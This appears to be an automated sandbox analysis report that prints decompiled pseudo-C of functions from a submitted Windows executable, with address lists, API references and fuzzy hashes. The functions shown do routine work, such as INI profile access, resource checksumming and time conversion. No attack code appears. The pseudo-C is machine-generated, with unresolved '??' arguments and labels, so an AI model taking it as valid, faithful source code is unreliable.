				 *_t57 = 0;
				 *((intOrPtr*)(_t59 + 0x69c)) = _t38;
				E00401000(_t59 + 0x492, _t48, 0x412054);
				 *_t57 = 0;
				 *((intOrPtr*)(_t59 + 0x284)) = 0;
				 *((intOrPtr*)(_t59 + 0x280)) = 0;
				 *((intOrPtr*)(_t59 + 0x278)) = 0;
				 *((intOrPtr*)(_t59 + 0x6a0)) = 0;
				_t42 = LoadIconW(GetModuleHandleW(0), 0x65); // executed
				E00401879(_t59, _t42);
				return _t59;
			}















                                                                                                                                                0x0040bb19
                                                                                                                                                0x0040bb1e
                                                                                                                                                0x0040bb24
                                                                                                                                                0x0040bb2a
                                                                                                                                                0x0040bb30
                                                                                                                                                0x0040bb36
                                                                                                                                                0x0040bb3d
                                                                                                                                                0x0040bb43
                                                                                                                                                0x0040bb4a
                                                                                                                                                0x0040bb52
                                                                                                                                                0x0040bb55
                                                                                                                                                0x0040bb57
                                                                                                                                                0x0040bb5a
                                                                                                                                                0x0040bb61
                                                                                                                                                0x0040bb64
                                                                                                                                                0x0040bb6c
                                                                                                                                                0x0040bb72
                                                                                                                                                0x0040bb7a
                                                                                                                                                0x0040bb81
                                                                                                                                                0x0040bb87
                                                                                                                                                0x0040bb8d
                                                                                                                                                0x0040bb93
                                                                                                                                                0x0040bb98
                                                                                                                                                0x0040bb9f
                                                                                                                                                0x0040bba2
                                                                                                                                                0x0040bba5
                                                                                                                                                0x0040bbad
                                                                                                                                                0x0040bbd6
                                                                                                                                                0x0040bbd6
                                                                                                                                                0x0040bbaf
                                                                                                                                                0x0040bbaf
                                                                                                                                                0x0040bbb2
                                                                                                                                                0x0040bbb6
                                                                                                                                                0x0040bbbd
                                                                                                                                                0x0040bbc3
                                                                                                                                                0x0040bbc9
                                                                                                                                                0x0040bbcf
                                                                                                                                                0x0040bbcf
                                                                                                                                                0x0040bbdd
                                                                                                                                                0x0040bbe3
                                                                                                                                                0x0040bbe8
                                                                                                                                                0x0040bbea
                                                                                                                                                0x0040bbeb
                                                                                                                                                0x0040bbf4
                                                                                                                                                0x0040bbf4
                                                                                                                                                0x0040bbed
                                                                                                                                                0x0040bbed
                                                                                                                                                0x0040bbed
                                                                                                                                                0x0040bbf6
                                                                                                                                                0x0040bbfc
                                                                                                                                                0x0040bc09
                                                                                                                                                0x0040bc0f
                                                                                                                                                0x0040bc17
                                                                                                                                                0x0040bc19
                                                                                                                                                0x0040bc1f
                                                                                                                                                0x0040bc25
                                                                                                                                                0x0040bc2b
                                                                                                                                                0x0040bc3a
                                                                                                                                                0x0040bc43
                                                                                                                                                0x0040bc4e

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040133A: memset.MSVCRT ref: 0040134C
                                                                                                                                                  • Part of subcall function 0040167A: memset.MSVCRT ref: 00401690
                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040BBA5
                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040BBE3
                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,00002238), ref: 0040BC31
                                                                                                                                                • LoadIconW.USER32(00000000,00000065), ref: 0040BC3A
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??2@memset$HandleIconLoadModule
                                                                                                                                                • String ID: T A
                                                                                                                                                • API String ID: 2596266805-11209434
                                                                                                                                                • Opcode ID: 28f27a63e90cc815c55cb4a811d49b2e7c75855d82e05ab2895167a3b64a2cb9
                                                                                                                                                • Instruction ID: b1f1b1f427025bd6f8a5dd4ebf1048772c532f9d5de5c5214c9bf7dacc49333d
                                                                                                                                                • Opcode Fuzzy Hash: 28f27a63e90cc815c55cb4a811d49b2e7c75855d82e05ab2895167a3b64a2cb9
                                                                                                                                                • Instruction Fuzzy Hash: 1F31ACB19013559FC720DF6989886CABBE8FF08300F11867FE84CDB261D7B89654CB98
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0040D56B, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 20%
                                                                                                                                                			E0040D56B(void* __ecx, wchar_t* __esi, void* __eflags, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, WCHAR* _a16, long _a20, WCHAR* _a24) {
				signed short _v131076;
				long _t17;

				_t25 = __esi;
				E0040E340(0x20000, __ecx);
				if(_a4 == 0) {
					_t17 = GetPrivateProfileStringW(_a8, _a12, _a16, __esi, _a20, _a24); // executed
					return _t17;
				} else {
					if(__esi == 0 || wcschr(__esi, 0x22) == 0) {
						_push(_a24);
					} else {
						_v131076 = _v131076 & 0x00000000;
						_push(__esi);
						_push(L"\"%s\"");
						_push(0xfffe);
						_push( &_v131076);
						L0040DFD6();
						_push(_a24);
						_push( &_v131076);
					}
					return WritePrivateProfileStringW(_a8, _a12, ??, ??);
				}
			}





                                                                                                                                                0x0040d56b
                                                                                                                                                0x0040d573
                                                                                                                                                0x0040d57c
                                                                                                                                                0x0040d5e0
                                                                                                                                                0x0040d5e7
                                                                                                                                                0x0040d57e
                                                                                                                                                0x0040d580
                                                                                                                                                0x0040d5be
                                                                                                                                                0x0040d590
                                                                                                                                                0x0040d590
                                                                                                                                                0x0040d598
                                                                                                                                                0x0040d599
                                                                                                                                                0x0040d5a4
                                                                                                                                                0x0040d5a9
                                                                                                                                                0x0040d5aa
                                                                                                                                                0x0040d5b2
                                                                                                                                                0x0040d5bb
                                                                                                                                                0x0040d5bb
                                                                                                                                                0x0040d5cf
                                                                                                                                                0x0040d5cf

                                                                                                                                                APIs
                                                                                                                                                • wcschr.MSVCRT ref: 0040D585
                                                                                                                                                • _snwprintf.MSVCRT ref: 0040D5AA
                                                                                                                                                • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0040D5C8
                                                                                                                                                • GetPrivateProfileStringW.KERNEL32 ref: 0040D5E0
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                                                                • String ID: "%s"
                                                                                                                                                • API String ID: 1343145685-3297466227
                                                                                                                                                • Opcode ID: 45fc58c28ada156cfd054f268333e9a0d59d786c8ed30cc34748915b681648c3
                                                                                                                                                • Instruction ID: 59b69a585cfc8d845437793ab3ce32260e68e2dddd06eaeef13322f749f2ab00
                                                                                                                                                • Opcode Fuzzy Hash: 45fc58c28ada156cfd054f268333e9a0d59d786c8ed30cc34748915b681648c3
                                                                                                                                                • Instruction Fuzzy Hash: 3101783290421ABBEF219F919C06FDA3B6AAF04318F048035BE05601A2D7798525DBA9
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0040CE3D, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloadertimeCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E0040CE3D(void* _a4, struct _FILETIME* _a8, struct _FILETIME* _a12, struct _FILETIME* _a16, struct _FILETIME* _a20) {
				int _t8;
				struct HINSTANCE__* _t9;

				if( *0x4136f4 == 0) {
					_t9 = GetModuleHandleW(L"kernel32.dll");
					if(_t9 != 0) {
						 *0x4136f4 = 1;
						 *0x4136f8 = GetProcAddress(_t9, "GetProcessTimes");
					}
				}
				if( *0x4136f8 == 0) {
					return 0;
				} else {
					_t8 = GetProcessTimes(_a4, _a8, _a12, _a16, _a20); // executed
					return _t8;
				}
			}





                                                                                                                                                0x0040ce47
                                                                                                                                                0x0040ce4e
                                                                                                                                                0x0040ce56
                                                                                                                                                0x0040ce5e
                                                                                                                                                0x0040ce6e
                                                                                                                                                0x0040ce6e
                                                                                                                                                0x0040ce56
                                                                                                                                                0x0040ce7a
                                                                                                                                                0x0040ce92
                                                                                                                                                0x0040ce7c
                                                                                                                                                0x0040ce8b
                                                                                                                                                0x0040ce8e
                                                                                                                                                0x0040ce8e

                                                                                                                                                APIs
                                                                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,0040D004,?,?,?,?,?,?,?), ref: 0040CE4E
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 0040CE68
                                                                                                                                                • GetProcessTimes.KERNELBASE(?,?,?,?,?,?,0040D004,?,?,?,?,?,?,?), ref: 0040CE8B
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressHandleModuleProcProcessTimes
                                                                                                                                                • String ID: GetProcessTimes$kernel32.dll
                                                                                                                                                • API String ID: 1714573020-3385500049
                                                                                                                                                • Opcode ID: 7c29d18577e7c0631cc297a8390a3d95ad77c93ea76d0503e1a5782c5d7fe6cc
                                                                                                                                                • Instruction ID: 9062282254ac126051856908680c029023e6c569a8a6eaee544e1b96dd2f004d
                                                                                                                                                • Opcode Fuzzy Hash: 7c29d18577e7c0631cc297a8390a3d95ad77c93ea76d0503e1a5782c5d7fe6cc
                                                                                                                                                • Instruction Fuzzy Hash: E7F03031141209FFDF218FA0ED45F963BA8AB14301F008176F92CA1AB0D77585A4DB9C
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 004076F4, Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 68%
                                                                                                                                                			E004076F4(intOrPtr* __edi) {
				void* __esi;
				void** _t11;
				intOrPtr* _t18;
				intOrPtr* _t27;
				void* _t28;
				intOrPtr _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				intOrPtr* _t36;

				_t27 = __edi;
				 *__edi = 0x410168;
				E0040768E(__edi);
				_t31 =  *((intOrPtr*)(__edi + 0x14));
				if(_t31 != 0) {
					E00406355(_t31);
					_push(_t31);
					L0040E032();
				}
				_t32 =  *((intOrPtr*)(_t27 + 0x10));
				if(_t32 != 0) {
					E00406355(_t32);
					_push(_t32);
					L0040E032();
				}
				_t33 =  *((intOrPtr*)(_t27 + 0xc));
				if(_t33 != 0) {
					E00406355(_t33);
					_push(_t33);
					L0040E032();
				}
				_t34 =  *((intOrPtr*)(_t27 + 8));
				if(_t34 != 0) {
					E00406355(_t34);
					_push(_t34);
					L0040E032();
				}
				_t18 = _t27;
				_pop(_t35);
				_push(_t27);
				_t36 = _t18;
				_t28 = 0;
				if( *((intOrPtr*)(_t36 + 4)) > 0 &&  *((intOrPtr*)(_t36 + 0x3c)) > 0) {
					do {
						 *((intOrPtr*)( *((intOrPtr*)(E00407588(_t36, _t28))) + 0xc))();
						_t28 = _t28 + 1;
					} while (_t28 <  *((intOrPtr*)(_t36 + 0x3c)));
				}
				_t11 =  *((intOrPtr*)( *_t36))();
				free( *_t11); // executed
				return _t11;
			}













                                                                                                                                                0x004076f4
                                                                                                                                                0x004076f7
                                                                                                                                                0x004076fd
                                                                                                                                                0x00407702
                                                                                                                                                0x00407707
                                                                                                                                                0x00407709
                                                                                                                                                0x0040770e
                                                                                                                                                0x0040770f
                                                                                                                                                0x00407714
                                                                                                                                                0x00407715
                                                                                                                                                0x0040771a
                                                                                                                                                0x0040771c
                                                                                                                                                0x00407721
                                                                                                                                                0x00407722
                                                                                                                                                0x00407727
                                                                                                                                                0x00407728
                                                                                                                                                0x0040772d
                                                                                                                                                0x0040772f
                                                                                                                                                0x00407734
                                                                                                                                                0x00407735
                                                                                                                                                0x0040773a
                                                                                                                                                0x0040773b
                                                                                                                                                0x00407740
                                                                                                                                                0x00407742
                                                                                                                                                0x00407747
                                                                                                                                                0x00407748
                                                                                                                                                0x0040774d
                                                                                                                                                0x0040774e
                                                                                                                                                0x00407750
                                                                                                                                                0x00407757
                                                                                                                                                0x00407758
                                                                                                                                                0x0040775a
                                                                                                                                                0x0040775f
                                                                                                                                                0x00407766
                                                                                                                                                0x00407770
                                                                                                                                                0x00407773
                                                                                                                                                0x00407774
                                                                                                                                                0x00407766
                                                                                                                                                0x0040777d
                                                                                                                                                0x00407781
                                                                                                                                                0x00407789

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040768E: ??3@YAXPAX@Z.MSVCRT ref: 0040769A
                                                                                                                                                  • Part of subcall function 0040768E: ??3@YAXPAX@Z.MSVCRT ref: 004076A8
                                                                                                                                                  • Part of subcall function 0040768E: ??3@YAXPAX@Z.MSVCRT ref: 004076B9
                                                                                                                                                  • Part of subcall function 0040768E: ??3@YAXPAX@Z.MSVCRT ref: 004076D0
                                                                                                                                                  • Part of subcall function 0040768E: ??3@YAXPAX@Z.MSVCRT ref: 004076D9
                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040770F
                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00407722
                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00407735
                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00407748
                                                                                                                                                • free.MSVCRT(00000000), ref: 00407781
                                                                                                                                                  • Part of subcall function 00406355: free.MSVCRT(00000000,004065BB,74B04E00,?,00000000), ref: 0040635C
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??3@$free
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2241099983-0
                                                                                                                                                • Opcode ID: 3a37e351f286feef7fe61f1ea2a5e01824fbcdfc648e7528773bb4aad7918a6a
                                                                                                                                                • Instruction ID: c8a6b3cb51e6e8f56dec58333c0ea0519a89c45fbe64381fe3d5b910dcd78a78
                                                                                                                                                • Opcode Fuzzy Hash: 3a37e351f286feef7fe61f1ea2a5e01824fbcdfc648e7528773bb4aad7918a6a
                                                                                                                                                • Instruction Fuzzy Hash: 9901C232E099305BC6257B3AD40191EB3A9AE80BA0316453FE905B73D1CB7C7C518ADE
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00401DCF, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 58COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 85%
                                                                                                                                                			E00401DCF(void* __ecx, signed int _a4, signed short* _a8) {
				signed int _t23;
				signed short* _t24;
				void* _t27;
				signed short* _t32;

				_t23 = _a4;
				_t32 = _a8;
				 *_t32 =  *_t32 & 0x00000000;
				_t27 = 0xa;
				if(_t23 > _t27) {
					L12:
					_t24 = _t32;
					L13:
					return _t24;
				}
				switch( *((intOrPtr*)(_t23 * 4 +  &M00401E73))) {
					case 0:
						__eax = __ecx + 0x38;
						goto L15;
					case 1:
						__eax = __ecx + 0x30;
						L15:
						__eax = E00401D90(__eax, __esi); // executed
						goto L12;
					case 2:
						__ecx =  *((intOrPtr*)(__ecx + 0x10));
						goto L18;
					case 3:
						__ecx =  *((intOrPtr*)(__ecx + 0x14));
						goto L18;
					case 4:
						__ecx =  *((intOrPtr*)(__ecx + 0x18));
						goto L18;
					case 5:
						__ecx =  *((intOrPtr*)(__ecx + 0x1c));
						L18:
						__eax = 0x412320;
						goto L3;
					case 6:
						__eflags =  *(__ecx + 0x40) & 0x00000001;
						goto L6;
					case 7:
						__eflags =  *(__ecx + 0x40) & 0x00002000;
						goto L6;
					case 8:
						__eflags =  *(__ecx + 0x40) & 0x00004000;
						L6:
						if(__eflags == 0) {
							_push(9);
							_pop(__ebx);
						}
						__eax = E00406827(__ebx);
						goto L13;
					case 9:
						_push( *((intOrPtr*)(__ecx + 0x2c)));
						_push( *((intOrPtr*)(__ecx + 0x28)));
						_push(L"%I64d");
						_push(0xff);
						_push(__esi);
						L0040DFD6();
						__esp = __esp + 0x14;
						goto L12;
					case 0xa:
						_t30 =  *((intOrPtr*)(__ecx + 0x20));
						L3:
						_t24 = E00406306(0x412340, _t30);
						if(_t24 == 0) {
							_t24 = 0x40f454;
						}
						goto L13;
				}
			}







                                                                                                                                                0x00401dd5
                                                                                                                                                0x00401dda
                                                                                                                                                0x00401ddd
                                                                                                                                                0x00401de3
                                                                                                                                                0x00401de6
                                                                                                                                                0x00401e40
                                                                                                                                                0x00401e40
                                                                                                                                                0x00401e42
                                                                                                                                                0x00401e47
                                                                                                                                                0x00401e47
                                                                                                                                                0x00401de8
                                                                                                                                                0x00000000
                                                                                                                                                0x00401e4a
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00401e55
                                                                                                                                                0x00401e4d
                                                                                                                                                0x00401e4e
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00401e5a
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00401e64
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00401e69
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00401e6e
                                                                                                                                                0x00401e5d
                                                                                                                                                0x00401e5d
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00401e07
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00401e1f
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00401e17
                                                                                                                                                0x00401e0b
                                                                                                                                                0x00401e0b
                                                                                                                                                0x00401e0d
                                                                                                                                                0x00401e0f
                                                                                                                                                0x00401e0f
                                                                                                                                                0x00401e10
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00401e27
                                                                                                                                                0x00401e2a
                                                                                                                                                0x00401e2d
                                                                                                                                                0x00401e32
                                                                                                                                                0x00401e37
                                                                                                                                                0x00401e38
                                                                                                                                                0x00401e3d
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00401def
                                                                                                                                                0x00401df7
                                                                                                                                                0x00401df7
                                                                                                                                                0x00401dfe
                                                                                                                                                0x00401e00
                                                                                                                                                0x00401e00
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _snwprintf
                                                                                                                                                • String ID: #A$%I64d$@#A
                                                                                                                                                • API String ID: 3988819677-2754857024
                                                                                                                                                • Opcode ID: 39a1b14ef70dc346d1b612ee092b96a4144a5099e147f5cc33a0ca018d1c3096
                                                                                                                                                • Instruction ID: 57e1b299ab2ee78cab24039c69e456b61a4fcaae797c094412e686c8a915beca
                                                                                                                                                • Opcode Fuzzy Hash: 39a1b14ef70dc346d1b612ee092b96a4144a5099e147f5cc33a0ca018d1c3096
                                                                                                                                                • Instruction Fuzzy Hash: A811BF31204204D7D724AA54D841AA97369BB01358B3004BFFE16AE2E2D77AD953D3CE
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0040D9FC, Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E0040D9FC(unsigned int _a4, WCHAR* _a8, WCHAR* _a12) {
				struct HRSRC__* _t12;
				void* _t16;
				void* _t17;
				signed int _t18;
				signed int _t26;
				signed int _t29;
				signed int _t33;
				struct HRSRC__* _t35;
				signed int _t36;

				_t12 = FindResourceW(_a4, _a12, _a8); // executed
				_t35 = _t12;
				if(_t35 != 0) {
					_t33 = SizeofResource(_a4, _t35);
					if(_t33 > 0) {
						_t16 = LoadResource(_a4, _t35);
						if(_t16 != 0) {
							_t17 = LockResource(_t16);
							if(_t17 != 0) {
								_a4 = _t33;
								_t29 = _t33 * _t33;
								_t36 = 0;
								_t7 =  &_a4;
								 *_t7 = _a4 >> 2;
								if( *_t7 != 0) {
									do {
										_t26 =  *(_t17 + _t36 * 4) * _t36 * _t33 * 0x00000011 ^  *(_t17 + _t36 * 4) + _t29;
										_t36 = _t36 + 1;
										_t29 = _t26;
									} while (_t36 < _a4);
								}
								_t18 =  *0x412b10; // 0x10350e5a
								 *0x412b10 = _t18 + _t29 ^ _t33;
							}
						}
					}
				}
				return 1;
			}












                                                                                                                                                0x0040da09
                                                                                                                                                0x0040da0f
                                                                                                                                                0x0040da13
                                                                                                                                                0x0040da20
                                                                                                                                                0x0040da24
                                                                                                                                                0x0040da2a
                                                                                                                                                0x0040da32
                                                                                                                                                0x0040da35
                                                                                                                                                0x0040da3d
                                                                                                                                                0x0040da41
                                                                                                                                                0x0040da44
                                                                                                                                                0x0040da47
                                                                                                                                                0x0040da49
                                                                                                                                                0x0040da49
                                                                                                                                                0x0040da4d
                                                                                                                                                0x0040da50
                                                                                                                                                0x0040da60
                                                                                                                                                0x0040da62
                                                                                                                                                0x0040da66
                                                                                                                                                0x0040da66
                                                                                                                                                0x0040da6a
                                                                                                                                                0x0040da6b
                                                                                                                                                0x0040da74
                                                                                                                                                0x0040da74
                                                                                                                                                0x0040da3d
                                                                                                                                                0x0040da32
                                                                                                                                                0x0040da79
                                                                                                                                                0x0040da7f

                                                                                                                                                APIs
                                                                                                                                                • FindResourceW.KERNELBASE(?,?,?), ref: 0040DA09
                                                                                                                                                • SizeofResource.KERNEL32(?,00000000), ref: 0040DA1A
                                                                                                                                                • LoadResource.KERNEL32(?,00000000), ref: 0040DA2A
                                                                                                                                                • LockResource.KERNEL32(00000000), ref: 0040DA35
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3473537107-0
                                                                                                                                                • Opcode ID: 3f2537d69a83dbad711086520e7fd7dadb7db9e2dcff2647f4325042d9b9d9c7
                                                                                                                                                • Instruction ID: 1e085ebe6cf1454c0a13dd2dc3297af32645bfe8ec8fc95f9f4fc45ffd099028
                                                                                                                                                • Opcode Fuzzy Hash: 3f2537d69a83dbad711086520e7fd7dadb7db9e2dcff2647f4325042d9b9d9c7
                                                                                                                                                • Instruction Fuzzy Hash: 9B018032B04215ABCB299FE5DD4995BBFAAFB853907048036AC09EA360D770CD14CAD8
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0040562D, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 38COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E0040562D(signed int* __eax, void* __edx, void** __edi, signed int _a4, char _a8) {
				void* _t8;
				void* _t13;
				signed int _t16;
				void** _t21;
				signed int _t22;

				_t21 = __edi;
				_t22 =  *__eax;
				if(__edx < _t22) {
					return 0;
				} else {
					_t13 =  *__edi;
					do {
						_t1 =  &_a8; // 0x40655f
						 *__eax =  *__eax +  *_t1;
						_t16 =  *__eax;
					} while (__edx >= _t16);
					_t8 = malloc(_t16 * _a4); // executed
					 *__edi = _t8;
					if(_t22 > 0) {
						if(_t8 != 0) {
							memcpy(_t8, _t13, _t22 * _a4);
						}
						free(_t13); // executed
					}
					return 0 |  *_t21 != 0x00000000;
				}
			}








                                                                                                                                                0x0040562d
                                                                                                                                                0x0040562e
                                                                                                                                                0x00405632
                                                                                                                                                0x0040567d
                                                                                                                                                0x00405634
                                                                                                                                                0x00405635
                                                                                                                                                0x00405637
                                                                                                                                                0x00405637
                                                                                                                                                0x0040563b
                                                                                                                                                0x0040563d
                                                                                                                                                0x0040563f
                                                                                                                                                0x00405649
                                                                                                                                                0x00405651
                                                                                                                                                0x00405653
                                                                                                                                                0x00405657
                                                                                                                                                0x00405661
                                                                                                                                                0x00405666
                                                                                                                                                0x0040566a
                                                                                                                                                0x0040566f
                                                                                                                                                0x00405679
                                                                                                                                                0x00405679

                                                                                                                                                APIs
                                                                                                                                                • malloc.MSVCRT ref: 00405649
                                                                                                                                                • memcpy.MSVCRT ref: 00405661
                                                                                                                                                • free.MSVCRT(00000000,00000000,?,00406343,00000002,?,00000000,?,0040655F,74B04E00,?,00000000), ref: 0040566A
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: freemallocmemcpy
                                                                                                                                                • String ID: _e@
                                                                                                                                                • API String ID: 3056473165-4143410925
                                                                                                                                                • Opcode ID: 3078e6390c3b9a2d3984cf8c16c15fdfdd782231e9a83da3d75a0699d865d50d
                                                                                                                                                • Instruction ID: 65c1df984c8dd591618957182971b53504cae5b365517194d008c843f4823b23
                                                                                                                                                • Opcode Fuzzy Hash: 3078e6390c3b9a2d3984cf8c16c15fdfdd782231e9a83da3d75a0699d865d50d
                                                                                                                                                • Instruction Fuzzy Hash: 78F0E2B26052229FC718AB76B98184BB3ADEF443247504C3FF408E3281D7399C50CFA8
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 004061CD, Relevance: 6.0, APIs: 4, Instructions: 34timeCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 60%
                                                                                                                                                			E004061CD(FILETIME* __edi, signed int* __esi) {
				struct _SYSTEMTIME _v20;
				struct _SYSTEMTIME _v36;
				int _t12;

				if(__edi->dwHighDateTime != 0) {
					FileTimeToSystemTime(__edi,  &_v20);
					_t12 = SystemTimeToTzSpecificLocalTime(0,  &_v20,  &_v36); // executed
					_push(__esi);
					if(_t12 == 0) {
						return FileTimeToLocalFileTime(__edi, ??);
					} else {
						SystemTimeToFileTime( &_v36, ??);
						return 1;
					}
				} else {
					 *__esi =  *__esi & 0x00000000;
					__esi[1] = __esi[1] & 0x00000000;
					return 0;
				}
			}






                                                                                                                                                0x004061d7
                                                                                                                                                0x004061e9
                                                                                                                                                0x004061f9
                                                                                                                                                0x00406201
                                                                                                                                                0x00406202
                                                                                                                                                0x0040621b
                                                                                                                                                0x00406204
                                                                                                                                                0x00406208
                                                                                                                                                0x00406212
                                                                                                                                                0x00406212
                                                                                                                                                0x004061d9
                                                                                                                                                0x004061d9
